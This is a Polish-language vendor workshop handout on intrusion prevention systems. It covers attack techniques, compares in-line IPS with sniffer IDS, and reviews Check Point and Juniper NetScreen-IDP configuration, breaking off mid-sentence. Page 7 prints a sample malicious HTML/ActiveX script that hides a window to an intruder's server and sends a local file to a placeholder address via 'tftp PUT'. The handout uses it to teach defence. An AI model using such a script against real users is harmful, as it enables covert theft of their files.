Skuteczne zapobieganie włamaniom Intrusion Prevention Systems

Wielkość: px
Rozpocząć pokaz od strony:

Download "Skuteczne zapobieganie włamaniom Intrusion Prevention Systems"

Transkrypt

1 PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Skuteczne zapobieganie włamaniom Intrusion Prevention Systems WARSZTATY ZABEZPIECZEŃ Opracował: Mariusz Stawowski Check Point Certified Security Expert Plus NetScreen Certified Security Professional CLICO Sp. z o.o., Al. 3-go Maja 7, Kraków; Tel: ; ; Fax: ; Ftp.clico.pl.;

2 Program warsztatów: 1. Techniki ataku stosowane przez intruzów i metody ochrony. 2. Przegląd dostępnych na rynku rozwiązań zabezpieczeń IPS (m.in. Check Point, ISS, Juniper NetScreen). 3. Projektowanie zabezpieczeń przed atakami intruzów (Network-Host IPS). 4. Konfiguracja systemów Network IPS. 5. Dostrajanie zabezpieczeń IPS i praktyczna ocena ich skuteczności na wykonywane ataki (m.in. włamania przez Exploit, ataki DoS). 6. Zarządzanie bezpieczeństwem w systemach Network IPS (m.in. Check Point SmartDashboard, ISS SiteProtector, Juniper NetScreen-IDP Manager). System zabezpieczeń Network IPS blokuje pakiety, w których wykryty został złośliwy kod (np. exploit, DoS, shellcode) i nie dopuszcza aby dotarły one do chronionych zasobów systemu informatycznego 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 2

3 1. Techniki ataku stosowane przez intruzów i metody ochrony Zasoby systemu informatycznego narażone są na wiele, różnego rodzaju niebezpieczeństw, najczęściej wynikających z globalnego charakteru oraz dużego skomplikowania środowiska sieci komputerowych (np. Internet, intranet, ekstranet). Ogólna klasyfikacja zagrożeń: 1. Ataki sieciowe (np. włamania i penetracje, ataki DoS) 2. Zagrożenia transmisji danych (np. podsłuch sieciowy, przechwytywanie sesji) 3. Zagrożenia aplikacyjne (np. wirusy, robaki, konie trojańskie) 4. Zagrożenia kryptograficzne (np. nieaktualne, bądź zagubione klucze szyfrowania) 5. Przeciek informacji (np. informacje o klauzuli tajności Tajne są dostępne dla systemu komputerowego o klauzuli Jawne) 6. Zagrożenia komunikacyjne (np. przeciążenia sieci, niewłaściwy ruting sieci) 7. Awarie techniczne (np. awaria sprzętu, błąd oprogramowania) 8. Błędy ludzi (np. błędy użytkowników, administratorów) 9. Zagrożenie fizyczne (np. kradzież, pożar, zalanie) 10. Ulot elektromagnetyczny Zagrożenia systemów komputerowych najczęściej kojarzone są z tzw. wtargnięciami (ang. intrusion). Pod tym pojęciem rozumiane są wszelkie działania, które spowodowały naruszenie integralności, poufności lub dostępności zasobów systemu komputerowego (danych, usług). Można wyróżnić następujące podstawowe kategorie wtargnięć: włamanie (ang. break-in) przejęcie i wykorzystanie konta i zasobów użytkownika systemu komputerowego lub administratora, odmowa usługi (ang. denial of service) obniżenie lub całkowite zablokowanie dostępności zasobów i usług systemu komputerowego, złośliwe użytkowanie (ang. maliciouse use) wykorzystywanie zasobów i usług systemu komputerowego niezgodnie z zasadami prawidłowego użytkowania (np. w celu naruszenia integralności i autentyczności danych), przeciek (ang. leakage) niekontrolowany wypływ informacji z systemu komputerowego (np. dokument o klauzuli Tajne został przesyłany do sieci publicznej), maskarada (ang. masquerade) podszywanie się pod innego, zwykle bardziej uprzywilejowanego użytkownika systemu komputerowego, penetracja (ang. penetration) nieupoważnione rozpoznawanie zabezpieczeń systemu komputerowego (np. w celu znalezienia słabych punktów, poprzez które można przeprowadzić włamanie), podsłuch sieciowy (ang. network sniffing) - rejestrowanie informacji przesyłanych za pośrednictwem sieci, przechwytywanie połączeń sieciowych (ang. connection hijacking) przejmowanie zainicjowanych połączeń klient-serwer (tzn. intruz będący na drodze komunikacji sieciowej przejmuje kontrolę nad połączeniem i zaczyna działać w imieniu klienta lub serwera aplikacji) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 3

4 Podsłuch sieciowy może być prowadzony za pomocą dedykowanych urządzeń podsłuchowych, podłączonych do sieci na drodze transmisji danych lub przy użyciu zwykłych komputerów wyposażonych w odpowiednie oprogramowanie, które selektywnie odczytuje pakiety danych (np. Network Monitor w Windows NT/2000, Snoop w SUN Solaris). Wyróżnia się dwa rodzaje podsłuchu: pasywny (ang. passive sniffing) sniffer wprowadza kartę sieciową w tryb promiscous i analizuje wszystkie odczytane ramki sieci fizycznej, aktywny (ang. active sniffing) sniffer wykorzystuje technikę ARP Spoofing do przekierowania komunikacji sieciowej do swojego portu w przełączniku (ang. switch). Obecnie, oprócz technik kryptograficznych (m.in. VPN), nie ma skutecznych narzędzi przeciwdziałania zagrożeniom podsłuchu i przechwytywania połączeń. W sieciach LAN stosując przełączniki zamiast zwykłych koncentratorów (ang. hub) można zabezpieczyć się tylko przed podsłuchem pasywnym. Dostępne programy monitorujące pracę sieci komputerowej nie gwarantują wykrycia dobrze zamaskowanego Sniffera. Okazuje się, iż nawet zastosowanie łącza światłowodowego, które do niedawna uznawane było za w pełni bezpieczne, nie zapewnia pełnej tajności transmitowanych informacji. Odrębną klasę zagrożeń związanych z podsłuchem stanowi tzw. promieniowanie ujawniające (określane także jako ulot elektromagnetyczny), czyli promieniowanie elektromagnetyczne emitowane przez sprzęt komputerowy (np. monitory, drukarki), które może być rejestrowane nawet ze znacznych odległości. Inny podział zagrożeń odnosi się do konkretnych technik stosowanych przez intruzów. Typowe zagrożenia z Internetu to exploits oraz (D)DoS. Pod pojęciem exploits rozumiane jest uzyskanie nieupoważnionego dostępu do systemu poprzez wykorzystanie podatności systemu (np. błędów oprogramowania, konfiguracji). Zagrożenia (D)DoS odnoszą się do zakłócania, bądź zablokowania usług systemu informatycznego, m.in.: Flooding wysyłanie dużej liczby pakietów (zapytań, danych), Smurfing zwielokrotnienie ataku Flooding poprzez użycie IP Broadcasts i IP Spoofing, IP Fragmentation Attacks wykorzystanie błędów implementacji stosu TCP/IP, SYN Flooding wysyłanie dużej liczby zapytań SYN w imieniu nie istniejącego klienta TCP (IP Spoofing), Nuking wysyłanie specjalnie spreparowanych pakietów ICMP i TCP w celu zamknięcia aktywnego połączenia sieciowego, specyficzne DoS wysyłanie zapytań blokujących usługi serwera sieciowego poprzez wykorzystanie specyficznych błędów tego serwera, DDoS zmasowane ataki DoS wykonywane przez wiele setek lub tysięcy specjalnie zaprogramowanych agentów CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 4

5 Kolejną klasę zagrożeń stanowią złośliwe aplikacje (ang. malicious programs). Ogólnie, pod tym pojęciem kryją się aplikacje stworzone z myślą o wyrządzeniu szkody w systemie komputerowym, w którym zostaną uruchomione. W tym gronie można wyróżnić następujące aplikacje: wirus (ang. virus) - program dopisujący się do innego programu, który atakuje system w trakcie uruchomienia swojego żywiciela, bakteria (ang. bacteria), królik (ang. rabbit) - program wielokrotnie kopiujący i uruchamiający swój własny kod, celem pełnego zagarnięcia zasobów komputera (czasu procesora, pamięci operacyjnej, przestrzeni dyskowej) i doprowadzenia do zablokowania systemu, koń trojański (ang. trojan horse) - program, który udaje pracę innego legalnego programu, a w międzyczasie wykonuje szereg niepożądanych czynności (np. fałszywy program Login lub Telnet przechwytuje hasło użytkownika), bomba czasowa (ang. time bomb), bomba logiczna (ang. logic bomb) - fragment programu podejmujący nietypowe działanie tylko w określonym czasie (np. w dniu urodzin autora programu) lub w momencie spełnienia ustalonych warunków, robak (ang. worm) - program, który powiela samego siebie, wykonuje ustalone czynności (najczęściej niekorzystne dla systemu) i próbuje samodzielnie przenieść się do innego komputera w sieci. Niebezpieczeństwo mogą stanowić także niektóre rozszerzenia języka opisu dokumentów hipertekstowych HTML (np. Java, ActiveX), wśród których szczególnie groźne może być ActiveX. Dołączane do stron WWW procedury ActiveX to programy wykonywalne posiadające duże uprawnienia w systemie operacyjnym komputera. Kolejną kategorią zagrożeń są furtki (ang. backdoors) lub włazy (ang. trapdoors), czyli nielegalne metody dostępu do systemu komputerowych. Mogą one zostać stworzone przez programistów (np. do celów testowania aplikacji), bądź intruzów, którzy dokonali włamania do systemu komputerowego. Jedną z najpowszechniej stosowanych technik oszukiwania zabezpieczeń systemów informatycznych jest Spoofing. Określenie Spoofing wywodzi się z dziedziny wojskowej i oznacza przeciwdziałanie elektronicznym przeciwsystemom nieprzyjaciela poprzez nadawanie fałszywych informacji. W odniesieniu do zagadnienia transmisji danych najbardziej popularny jest Source IP Address Spoofing, który polega na przesyłaniu pakietów zawierających sfałszowany adres źródłowy (ang. source address), tak aby komputer odbierający te pakiety błędnie identyfikował ich nadawcę. Najczęściej IP Spoofing wykonywany jest z obszaru sieci publicznej, skąd intruz wysyła pakiety danych w imieniu uprzywilejowanego komputera zlokalizowanego w atakowanej sieci prywatnej. Atak IP Spoofing można częściowo zablokować poprzez odpowiednio skonfigurowany filtr pakietów, który działając na ruterze lub firewall blokuje wszystkie pakiety napływające z sieci publicznej, które posiadają adres źródłowy z sieci prywatnej. Inne znane odmiany tej techniki to: DNS Spoofing, Port Spoofing, ARP Spoofing i Mail Spoofing CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 5

6 Typowe techniki włamań Intruzi stosują wiele różnych metod ataku. Można wyróżnić dwie uznawane za najgroźniejsze techniki włamań do systemów komputerowych: włamanie przez exploit polegające na bezpośrednim połączeniu intruza z atakowanym systemem i wykonaniu w nim niedozwolonych działań dzięki wykorzystaniu błędu jego aplikacji, włamanie przez agenta polegające na przesłaniu do systemu specjalnie napisanego programu, który po uruchomieniu wykonuje niedozwolone działania zaprogramowane przez intruza. Serwer Web Serwer DB (SQL) Internet 1/ Udane włamanie na serwer DMZ 2/ Atak na serwery w sieci wewnętrznej Firewall Sieć wewn. firmy Typowy scenariusz włamania do sieci Obserwowane w Internecie ataki zwykle rozpoczynają się od penetracji i przejęcia kontroli nad serwerem publicznym firmy (np. Web, SMTP). Serwery takie w większości firm znajdują się w wydzielonym segmencie sieci tzw. DMZ. Wykonanie włamania na serwer jest możliwe, gdy oprogramowanie tego serwera posiada błąd umożliwiający uruchamianie poleceń systemowych. Można w ten sposób skopiować na serwer aplikację typu Trojan (np. NetCat, NetBus, BO, SubSeven) i uruchomić ją w celu uzyskania zdalnego dostępu do systemu. Po przejęciu kontroli nad serwerem intruz może wykonywać na nim różnego rodzaju działania (np. Web graffiti) lub kontynuować atak na inne strefy bezpieczeństwa (np. sieć wewnętrzną). Taktyka przejmowania kontroli nad kolejnymi strefami bezpieczeństwa w sieci nosi nazwę Island Hopping Attack. Włamanie przez agenta polega na przesłaniu do sieci wewnętrznej firmy złośliwego kodu (ang. malicious code). Odbywa się to zwykle za pomocą ogólnie dostępnych usług sieciowych. Dla przykładu, pocztą elektroniczną można przesłać do określonego użytkownika kod JavaScript lub ActiveX jako zawartość wiadomości napisanej w języku HTML. W razie stosowania przez użytkownika nieaktualnej wersji klienta poczty lub przeglądarki Web, bądź też ich niewłaściwej konfiguracji (np. pozwalającej na wykonywanie bez ograniczeń aplikacji ActiveX) uruchomiony kod dokona skopiowania plików użytkownika, bądź innych niebezpiecznych działań. Kod uruchomiony przez klienta poczty na komputerze użytkownika może próbować wykonać niedozwolone operacje lub uruchomić przeglądarkę Web, która z komputera intruzami załaduje i uruchomi inny złośliwy kod. Poniżej przedstawiono przykładowy kod agenta CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 6

7 <html><body> Informacja dla uzytkownika. <script language="javascript"> <!-- // Zablokowanie prawego przycisku myszki. function A(e) { if (event.button==2) { alert("prosze czekac!") return false; } return true; } document.onmousedown=a; // --> </script> <script language="javascript"> <!-- // Zablokowanie przycisku ALT. function B() { if (event.keycode == 18 event.keycode == 115) alert("prosze jeszcze poczekac!") return false; } document.onkeydown =B; // --> </script> <script language="" javascript=""> <!-- // Otwarcie strony Web z serwera intruza i ukrycie jej. window.open('http://<adres>','_ex','resizable=no,scrollbars=yes,toolbar=no,location=no,directories=no,status=no,menubar=no'); if (window.blur) { window.focus(); } // --> </script> <script> // Przeslanie pliku na komputer intruza poprzez TFTP. a=new ActiveXObject("WSCript.Shell"); a.run("tftp -i <adres> PUT c:/katalog/plik plik"); alert("dziekuje za wspolprace!"); </script> </body></html> 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 7

8 Najczęściej stosowaną metodą w atakach exploit jest przepełnienie bufora (ang. buffer overflow). Technika polega na zapisaniu do bufora aplikacji dużej wielkości danych tak, aby nastąpiło jego przepełnienie i nadpisanie obszaru pamięci za buforem. Zwykle aplikacja otrzymuje w tej sposób nowy kod do wykonania. Atak exploit polega na wprowadzeniu i wykonaniu złośliwego kodu. Z uwagi na rodzaj buforów wykorzystywanych w atakach wyróżnia się dwie techniki ataku - rozbijanie stosu (ang. stack smashing) oraz rozbijanie sterty (ang. heap smashing). Poprawne działanie aplikacji pamięć przydzielona aplikacji Atak exploit pamięć przydzielona aplikacji aplikacja kontroluje wielkość wprowadzanych danych do bufora bufor aplikacji wprowadzone dane wykraczają poza rozmiar bufora bufor aplikacji złośliwy kod adres powrotu adres powrotu Koncepcja ataku exploit poprzez przepełnienie bufora Aplikacja uruchomiona w komputerze ma do dyspozycji określony rozmiar pamięci, z której korzysta w trakcie wykonywania swoich funkcji (m.in. przetwarzania danych). Dane aplikacji są składowane w obszarach pamięci określanych jako bufory. W pamięci zapisany jest także adres, który określa gdzie aplikacja powinna przejść po zakończeniu bieżącej funkcji tzw. adres powrotu. Poprawnie napisana aplikacja kontroluje dane wprowadzane do bufora i nie pozwala na przekroczenie jego dopuszczalnego rozmiaru. Jeżeli jednak aplikacja nie jest właściwie napisana istnieje możliwość wprowadzenia danych przekraczających dopuszczalną wielkość bufora. Rysunek przedstawia koncepcję ataku exploit poprzez przepełnienie bufora. Intruz wprowadza do pamięci kod do wykonania (np. uruchomienie backdoor na określonym porcie TCP) i zmienia adres powrotu funkcji tak, aby kod został uruchomiony. W dalszej części opracowania zostaną przedstawione przykłady praktycznych implementacji zabezpieczeń przed tą kategorią ataków CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 8

9 Skuteczność systemów ochrony Atak przez exploit jest zwykle wykonywany w bardzo krótkim czasie. Jest to jednokrotne połączenie z serwerem i uruchomienie na nim złośliwego kodu. W praktyce za pomocą zabezpieczeń Sniffer IDS nawet zintegrowanych z systemem firewall (tzw. firewall signaling) nie ma możliwości blokowania ataków. Jedyne skuteczne w tym zakresie środki ochrony to Network IPS. Mimo pozornego podobieństwa Sniffer IDS zintegrowany z firewallem zachowuje się zupełnie inaczej jak Network IPS i w rzeczywistości stwarza większe zagrożenie niż korzyści. Różnicę tę najlepiej zrozumieć analizując popularne scenariusze włamań do systemów informatycznych. Zasady działania obu rozwiązań ochrony przedstawia rysunek. Porównanie skuteczności dedykowanego systemu Network IPS i Sniffer IDS zintegrowanego z firewallem można łatwo przeprowadzić nawet w warunkach prostej sieci lab. Internet/ WAN Internet/ WAN 1 Intruz wykonuje atak na zasoby syst. informatycznego 1 Intruz wykonuje atak na zasoby syst. informatycznego 6 Intruz uzyskuje dostęp do zasobów syst. informatycznego (np. poprzez backdoor używając innego adresu IP) Sniffer IDS 5 Firewall blokuje adres IP, z którego wykonano atak 4 2 Sniffer IDS wykrywa atak Sniffer IDS informuje firewall o ataku z określonego adresu IP 2 Network IPS wykrywa atak i blokuje pakiety, które wykonują ten atak Network IPS firewall 3 Intruz przejmuje kontrolę nad systemem i instaluje backdoor Porównanie działania Network IPS z działaniem Sniffer IDS zintegrowanego z firewallem 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 9

10 Tabela 1 przedstawia porównanie własności dedykowanego systemu zabezpieczeń Network IPS z systemem Sniffer IDS zintegrowanym z zewnętrznym firewallem. Tabela 1) Porównanie własności Sniffer IDS i Network IPS Zabezpieczenie Sniffer IDS zintegrowany z firewallem Network IPS Własności Ochrona zasobów systemu informatycznego przed atakami Wykrywalność ataków Zagrożenie zakłócania pracy systemu informatycznego Brak możliwości blokowania ataków i ochrony zasobów systemu informatycznego. Reakcja Sniffer IDS odbywa się po wykonaniu ataku. Typowy atak sieciowy to uruchomienie exploit typu przepełnienie bufora, załadowanie shellcode i instalacja backdoor. Czas trwania ataku jest bardzo krótki, a Sniffer IDS nie ma możliwości jego zablokowania poprzez wykonanie TCP Reset. Zablokowanie na firewallu adresu IP, z którego wykonano atak także jest nieskuteczne. Intruz może bowiem mając zainstalowany backdoor uzyskać dostęp do systemu używając innego adresu IP. Analiza ruchu sieciowego na zasadzie nasłuchu jest skomplikowana i istnieje zagrożenie gubienia pakietów. Sniffer-IDS ma utrudnione zadanie z uwagi na występujące w sieci przeciążenia, retransmisje TCP, fragmentację oraz różną kolejność napływających fragmentów datagramów. Na skutek tego zabezpieczenia Sniffer IDS charakteryzują się dużą liczbą fałszywych alarmów (ang. false positives) i nie wykrywają wszystkich ataków, nawet jeżeli posiadają w bazie ich sygnatury (patrz wyniki testów NSS Group - Blokowanie na firewall adresów IP, z których zostały zidentyfikowane przez Sniffer IDS ataki jest bardzo niebezpieczne (np. intruzi stosując IP Spoofing mogą wykonywać ataki używając adresów IP należących do oddziałów firmy, bądź jej klientów i partnerów. Atak jest blokowany przed uzyskaniem dostępu do chronionych zasobów systemu informatycznego. Network IPS blokuje pakiety, które wykonują atak. Network IPS w razie potrzeby realizuje także funkcje firewall. Network IPS analizuje całość ruchu sieciowego przepływającego przez urządzenie zabezpieczeń. Poprawne identyfikowanie ataków jest łatwiejsze jak w Sniffer IDS (m.in. w in-line nie ma zagrożenia zgubienia pakietów, Network IPS może wykonywać kompletowanie poddanych fragmentacji datagramów IP przed wpuszczeniem ich do sieci chronionej). Network IPS blokuje tylko pakiety wykonujące atak. Zagrożenie wprowadzania zakłóceń w pracy systemu informatycznego jest niewielkie CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 10

11 Oprócz włamań do systemów komputerowych wciąż duże niebezpieczeństwo stanowią podsłuch i przechwytywanie połączeń oraz ataki destrukcyjne i destabilizujące (D)DoS. Tabela 2 przedstawia podstawowe techniki ataków stosowane przez intruzów, metody ochrony i ich skuteczność. Tabela 2) Zagrożenia, zabezpieczenia i ich skuteczność ochrony Lp. Technika ataku Rodzaj zabezpieczeń Skuteczność ochrony 1. Włamanie przez exploit Network IPS Firewall Host IPS Wysoka Średnia (zależy od zabezpieczeń firewall i techniki exploit) Średnia Sniffer IDS (Network IDS) Niska 2. Włamanie przez agenta Kontrola zawartości (AV) Wysoka 3. Podsłuch i przechwytywanie połączeń 4. Ataki (D)DoS Szyfrowanie transmisji danych (VPN) Network IPS Firewall Host IPS Wysoka Wysoka Średnia (zależy od rodzaju firewall i techniki DoS) Średnia Sniffer IDS (Network IDS) Niska 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 11

12 Systemy IPS są w stanie skutecznie, w sposób aktywny przeciwstawiać się atakom intruzów funkcjonując w trybie in-line (patrz rysunek). Zasady działania Network IPS są podobne do systemów firewall. Ruch wchodzi do urządzenia IPS przez interfejs sieciowy i wewnątrz jest poddawany analizie, a następnie wychodzi z urządzenia innym interfejsem. Dzięki temu kontrola ruchu sieciowego jest łatwiejsza, pojawia się mniej jak w Sniffer IDS fałszywych alarmów i co najważniejsze całkowicie eliminowane jest zagrożenie, że IPS zgubi pakiety. Najistotniejsze jest jednak, że w trybie in-line ataki mogą być w czasie rzeczywistym blokowane przed ich dotarciem do chronionych zasobów systemu informatycznego. Rysunek 4 przedstawia zasady kontroli ruchu sieciowego w systemie zabezpieczeń NetScreen-IDP. Analiza ruchu sieciowego odbywa się w oparciu o różne techniki detekcji m.in. Stateful Signatures, Protocol Anomalies, Network Honeypot, Backdoor Detection, Traffic Anomalies, Spoofing Detection, Layer 2 Detection i Denial of Service Detection. Kompletowanie danych (m.in. składanie pakietów poddanych fragmentacji, eliminacja retransmisji) Normalizacja danych (m.in. translacja różnych formatów i systemów kodowania danych) Śledzenie połączeń, przepływu i strumieni (m.in. klient-serwer, serwer-klient, kanały sterowania i danych, negocjacje TCP) Wykrywanie i blokowanie ataków i innych niedozwolonych działań Zasady kontroli ruchu sieciowego w systemie zabezpieczeń NetScreen-IDP Inną klasę zagrożeń stanowią ataki exploit wykonywane poprzez sesje szyfrowane (np. sesje HTTPS w systemach e-commerce i e-banking). Zabezpieczenia sieciowe nie są w stanie poddawać kontroli tych sesji. Skuteczną metodą ochrony jest terminowanie sesji SSL na urządzeniach zabezpieczeń i wykonywanie kontroli na odszyfrowanych pakietach. Obecnie wiodącym dostawcą tej klasy rozwiązań na świecie jest izraelska firma Radware (wg raportu Gartner z 2003r.) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 12

13 2. Przegląd dostępnych na rynku rozwiązań zabezpieczeń IPS Zapewnienie właściwej ochrony przed zagrożeniami z sieci to obecnie podstawowe wymaganie bezpieczeństwa w systemach informatycznych. Pojawiają się coraz bardziej doskonalone techniki penetracji i włamań jak ataki hybrydowe oraz szybko rozprzestrzeniające się w sieci inteligentne robaki i Trojany. Zabezpieczenia starej generacji jak Network IDS (ang. intrusion detection system) działające na zasadach nasłuchu sieci (określane także jako Sniffer IDS), czy firewalle typu Stateful Inspection nie radzą sobie z tym zadaniem. Od systemów zabezpieczeń wymagane jest wykrywanie ataków i ich skuteczne blokowanie. Zabezpieczenia tej klasy określane są jako IPS (ang. intrusion prevention system). Pierwszą ich implementacją były systemy Host IPS. Nie przyjęły się one jednak w powszechnym zastosowaniu, ponieważ sprawiają problemy ze stabilnością pracy chronionych serwerów i w praktyce nie blokują wielu ataków. Oprogramowanie Host IPS jest bowiem instalowane bezpośrednio na serwerach i przez to stwarza ich dodatkowe obciążenie i może powodować zakłócenia pracy. Konieczne stało się opracowanie zabezpieczeń sieciowych, które potrafią wykrywać ataki i skutecznie powstrzymywać je w czasie rzeczywistym (tzn. blokować pakiety wykonujące atak przed ich dotarciem do chronionych systemów). W ostatnich latach na rynku pojawiła się nowa generacja zabezpieczeń IPS łącząca w sobie funkcje firewall i IDS, określana jako Network IPS, In-line IDS lub Deep Packet Inspection. Przykładami tych zabezpieczeń są Check Point with Application Intelligence, ISS Proventia G, NAI McAfee IntruShield oraz NetScreen Intrusion Detection and Prevention (IDP). W dalszej części opracowania zostaną przedstawione przykłady konfiguracji i praktyczne testy zabezpieczeń z wykorzystaniem NetScreen-IDP. System ten jest pierwszym na rynku dojrzałym rozwiązaniem tej klasy CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 13

14 Dostępne na rynku rozwiązania Network IPS zasadniczo nie różnią się pod względem wykrywalności ataków 1. Rozwiązania Network IPS ogromnie jednak różną się w odniesieniu do możliwości zarządzania bezpieczeństwem, m.in.: tworzenia i dostrajania polityki bezpieczeństwa, monitorowania bezpieczeństwa, analizy i wyjaśniania incydentów, wykrywania naruszeń bezpieczeństwa (np. zainstalowanych na serwerach Trojan-ów i Backdoor-ów, nielegalnie podłączonych komputerów). W obecnej sytuacji gdzie zdecydowana większość ataków wykonywana jest przez robaki internetowe, a nie ludzi zarządzanie bezpieczeństwem jest krytyczne. Podstawowe funkcje bezpieczeństwa realizowane przez system zabezpieczeń IPS są następujące: wykrywanie i blokowanie penetracji i ataków wykonywanych przez intruzów i robaki internetowe (tzn. aplikacje samodzielnie włamujące się do systemów komputerowych), monitorowanie stanu bezpieczeństwa (m.in. wykrywanie robaków działających na stacjach pracowników), wspomaganie administratorów w zakresie wyjaśniania zaistniałych naruszeń bezpieczeństwa. Dodatkowo, zaawansowane rozwiązania jak Juniper NetScreen IDP realizują następujące funkcje bezpieczeństwa: oszukiwanie intruzów poprzez techniki Network Honeypot, wykrywanie nieupoważnionych komputerów podłączonych do sieci wewnętrznej, nadzorowanie przestrzegania przez pracowników przyjętej polityki bezpieczeństwa (np. wykorzystywania niedozwolonych aplikacji), wykrywanie systemów i aplikacji podatnych na błędy bezpieczeństwa, wykrywanie sytuacji przełamania zabezpieczeń (m.in. identyfikowanie połączeń z Backdoor za pomocą technik analizy heurystycznej oraz nowo otwartych portów na serwerach specyficznych dla Trojanów i Backdoor). Zarządzanie bezpieczeństwem wymaga stosowania przez administratorów odpowiednich narzędzi zwłaszcza, jeżeli w systemie zabezpieczeń występuje wiele sensorów IPS. Dostępne produkty zabezpieczeń IPS oferują w tym zakresie różne narzędzia i różną funkcjonalność. Zasadniczo dostępne są graficzne konsole GUI (np. w systemach Check Point InterSpect, ISS SiteProtector i Juniper NetScreen-IDP) oraz konsole Web (np. w systemach NAI IntruShield i Radware DefensePro). 1 Testy jakości systemów Network IPS zostały wykonane m.in. przez NSS Group CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 14

15 3. Projektowanie zabezpieczeń przed atakami intruzów (Network-Host IPS) Network IPS jest elementem systemu zabezpieczeń sieciowych, który stanowi wzmocnienie i uzupełnienie innych środków bezpieczeństwa istniejących w systemie informatycznym (m.in. zabezpieczeń firewall, mechanizmów ochrony w systemach operacyjnych, bazach danych i aplikacjach). Przed wdrożeniem zabezpieczeń należy przeprowadzić specyfikację wymagań bezpieczeństwa (m.in. analizę ryzyka) i ustalić: 1. Które zasoby systemu informatycznego podlegają ochronie przed atakami (np. serwery w sieci wewnętrznej, serwery DMZ). 2. Jakie są istotne zagrożenia zasobów i gdzie znajdują się ich źródła (np. włamania i ataki DoS z Internetu, włamania z sieci oddziałowych). 3. Jaka powinna być reakcja zabezpieczeń na ataki (np. alarmowanie, blokowanie ataków). 4. Gdzie powinny być zlokalizowane zabezpieczenia (np. w strefie DMZ, przed firewallem, w sieci wewnętrznej). Kluczową rolę odgrywa lokalizacja zabezpieczeń. Network IPS może stanowić skuteczną ochronę przed atakami z sieci będąc na drodze pomiędzy chronionymi zasobami systemu informatycznego i źródłami zagrożenia (intruzami). Projektowanie zabezpieczeń w pierwszej kolejności koncentruje się na najbardziej wartościowych zasobach systemu informatycznego (tzn. systemach komputerowych realizujących, bądź wspomagających zadania biznesowe instytucji). Nie należy jednak ograniczać się tylko do ochrony najbardziej wartościowych zasobów. Projektowane zabezpieczenia sieci powinny bowiem stanowić skuteczną ochronę przed atakami prowadzonymi techniką Island Hopping Attack. Technika ta polega na zdobywaniu nieupoważnionego dostępu do słabiej zabezpieczonych systemów komputerowych (najczęściej nie posiadających dużego znaczenia dla instytucji), a następnie wykorzystywaniu ich jako podłoża do penetracji lepiej ochranianych, wartościowych elementów systemu informatycznego. Identyfikacja istotnych zagrożeń systemu informatycznego wykonywana jest m.in. na podstawie analizy sposobu połączenia systemu z sieciami zewnętrznymi, dostępnych protokołów i usług sieci zewnętrznych, protokołów i usług świadczonych dla sieci zewnętrznych, usług i zasobów dostępnych dla użytkowników, a także metod współdziałania systemów zlokalizowanych w obszarach sieci o różnym poziomie zaufania (np. strefy DMZ i sieci wewnętrznej) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 15

16 4. Konfiguracja systemów Network IPS Check Point InterSpect Konfiguracja InterSpect rozpoczyna się od ustalenia trybu pracy urządzenia. Urządzenie może pracować jako Router (posiada adresy IP na interfejsach i wykonuje ruting), Bridge (działa transparentnie i dzieli sieć na strefy bezpieczeństwa) oraz Switch (działa transparentnie bez podziału sieci na strefy bezpieczeństwa). W konsoli SmartDashboard wprowadzamy ustawienia polityki bezpieczeństwa InterSpect. Ustawienia wprowadzane są globalnie dla całości systemu zabezpieczeń CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 16

17 Juniper NetScreen-IDP Konsola zarządzania Juniper NetScreen-IDP udostępnia w jednym miejscu ustawienia konfiguracji zabezpieczeń IPS oraz polityki bezpieczeństwa (jedna lub wiele polityk). Administrator zabezpieczeń może w skali całego przedsiębiorstwa zdefiniować jedną polityka bezpieczeństwa obejmującą wszystkie segmenty sieci. Dodatkowo, za pomocą Violation Objects Manager administrator zabezpieczeń IDP ma możliwość zdefiniowania zasad normalnej pracy systemu informatycznego i otrzymywania alarmów o naruszeniach przyjętej polityki bezpieczeństwa firmy (np. wykorzystywanie przez określonych pracowników niedozwolonych aplikacji). Konfiguracja i śledzenie zmian w systemie informatycznym odbywa się za pomocą narzędzi Enterprise Security Profiler (m.in. wykrywanie zainstalowanych Trojanów, wykrywanie nieupoważnionych komputerów podłączonych do sieci wewnętrznej, itd.) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 17

18 Polityka bezpieczeństwa IDP składa się ze zbioru reguł opisujących zasady funkcjonowania zabezpieczeń. Reguły definiowane są za pomocą graficznego edytora Policy Editor. Edytor polityki bezpieczeństwa zawiera pięć sekcji: Main podstawowe zasady monitorowania sieci, wykrywania działań niedozwolonych i podejrzanych oraz eliminowania ataków, Backdoor Detection analiza ruchu sieciowego (m.in. badanie heurystyczne) pod kątem wykrywania interakcyjnych sesji, wskazujących na istnienie aplikacji typu Trojan lub Backdoor, Network Honeypot prezentowanie nieprawdziwych informacji na temat usług systemu informatycznego w razie wykrycia nieupoważnionych prób dostępu, SYN-Protector ochrona serwerów przed atakami Syn Flood, Traffic Anomalies - wykrywanie podejrzanych działań w sieci (np. skanowanie portów TCP i UDP). Administrator definiując reguły kontroli ruchu sieciowego może wybrać tryb konfiguracji Basic, zawierający tylko podstawowe ustawienia lub Advanced, bardziej szczegółowo określający działanie IDP (View Main Rulebase). Jaki ruch sieciowy podlega inspekcji? Czego należy szukać (m.in. jakich rodzajów ataków)? Jakie działania należy podejmować w razie wykrycia zdarzenia? Uwaga: Włączona opcja Terminal w regule polityki bezpieczeństwa w sekcji Main oznacza, że w razie wykrycia ataku w określonej komunikacji nie jest ona poddawana analizie względem kolejnych reguł (tzn. IDP wykonuje ustaloną w regule akcję i nie sprawdza następnych reguł). W innych sekcjach polityki bezpieczeństwa 